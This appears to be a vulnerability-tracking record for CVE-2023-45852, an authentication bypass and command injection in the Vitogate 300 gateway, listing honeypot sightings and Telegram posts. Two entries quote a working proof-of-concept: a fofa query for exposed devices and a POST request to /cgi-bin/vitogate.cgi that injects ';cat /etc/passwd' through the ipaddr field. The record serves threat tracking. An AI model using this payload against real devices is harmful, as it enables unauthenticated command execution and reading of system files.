{"vulnerability": "CVE-2023-45852", "sightings": [{"uuid": "3c1ce37f-0369-4f17-8a17-41361ab582df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-45852", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-27)", "content": "", "creation_timestamp": "2025-03-27T00:00:00.000000Z"}, {"uuid": "359d0df9-88cf-49a8-9b6f-cd25933e1491", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-45852", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-29)", "content": "", "creation_timestamp": "2025-07-29T00:00:00.000000Z"}, {"uuid": "67a20398-7c37-4461-b00b-80e07cddbe4f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-45852", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-05)", "content": "", "creation_timestamp": "2025-10-05T00:00:00.000000Z"}, {"uuid": "a007e897-c528-4153-9fc6-50a88f0df0d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-45852", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-09)", "content": "", "creation_timestamp": "2026-03-09T00:00:00.000000Z"}, {"uuid": "f64932a4-61ab-48c1-a433-05a9b0b7a251", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-45852", "type": "published-proof-of-concept", "source": "Telegram/BUq-I64O_2qCWh7EKaq9hyKm7meoxoNShmWBZXweoLJ3ZA", "content": "", "creation_timestamp": "2024-01-18T15:36:02.000000Z"}, {"uuid": "7580e0f1-77af-482a-939b-da552e7f8f3a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-45852", "type": "published-proof-of-concept", "source": "https://t.me/Teamx1945x/6863", "content": "CVE-2023-45852\n\nfofa  title=\"Vitogate 300\"\n\nPOST /cgi-bin/vitogate.cgi HTTP/1.1\nHost: 127.0.0.1\nContent-Type: application/json\n\n{\"method\":\"put\",\"form\":\"form-4-8\",\"session\":\"\",\"params\":{\"ipaddr\":\"{{randstr}};cat /etc/passwd\"}}\n\ncat /etc/passwd\n\n#poc #exploit", "creation_timestamp": "2024-06-08T00:15:49.000000Z"}, {"uuid": "3f75802a-6655-4d02-8478-2388130944cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-45852", "type": "published-proof-of-concept", "source": "Telegram/u-C24l9XxHu7bdFiH5W60ovVUpL1uXNndLlHucoZU6-x0g", "content": "", "creation_timestamp": "2024-01-18T05:30:12.000000Z"}, {"uuid": "be144c1e-e3c3-454d-aee3-4f71d3036412", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-45852", "type": "published-proof-of-concept", "source": "Telegram/Lbe1p7J_4UrgGxDKp8IA3nPHBW7KShSv3HLtF2U-f5RWFw", "content": "", "creation_timestamp": "2024-01-26T02:15:27.000000Z"}, {"uuid": "f6cb8e10-b50a-47e9-ba57-a154e181ffe7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-45852", "type": "published-proof-of-concept", "source": "Telegram/-CUWKwBEcwVjAmflph_UE2rR4naQmsMl4HRbXghsNm8kRw", "content": "", "creation_timestamp": "2023-10-31T19:52:09.000000Z"}, {"uuid": "0a7feab4-e10c-4c80-b61c-7503ffe14f32", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-45852", "type": "seen", "source": "https://t.me/cibsecurity/72279", "content": "\u203c CVE-2023-45852 \u203c\n\nIn Vitogate 300 2.1.3.0, /cgi-bin/vitogate.cgi allows an unauthenticated attacker to bypass authentication and execute arbitrary commands via shell metacharacters in the ipaddr params JSON data for the put method.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-10-14T07:29:31.000000Z"}, {"uuid": "0084b13e-b25d-4a49-ab96-50bc885071f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-45852", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/1867", "content": "CVE-2023-45852\n\nfofa  title=\"Vitogate 300\"\n\nPOST /cgi-bin/vitogate.cgi HTTP/1.1\nHost: 127.0.0.1\nContent-Type: application/json\n\n{\"method\":\"put\",\"form\":\"form-4-8\",\"session\":\"\",\"params\":{\"ipaddr\":\"{{randstr}};cat /etc/passwd\"}}\n\ncat /etc/passwd\n\n#poc #exploit", "creation_timestamp": "2024-01-18T09:33:45.000000Z"}, {"uuid": "9a4f8a4a-829c-4470-a6a6-276c43164a3b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-45852", "type": "published-proof-of-concept", "source": "https://t.me/arvinclub1/1048", "content": "\u26a0\ufe0f\u26a0\ufe0f#CVE-2023-45852: Vitogate 300 Authentication Bypass and RCE                                    https://github.com/Push3AX/vul/blob/main/viessmann/Vitogate300_RCE.md", "creation_timestamp": "2023-12-07T10:47:27.000000Z"}]}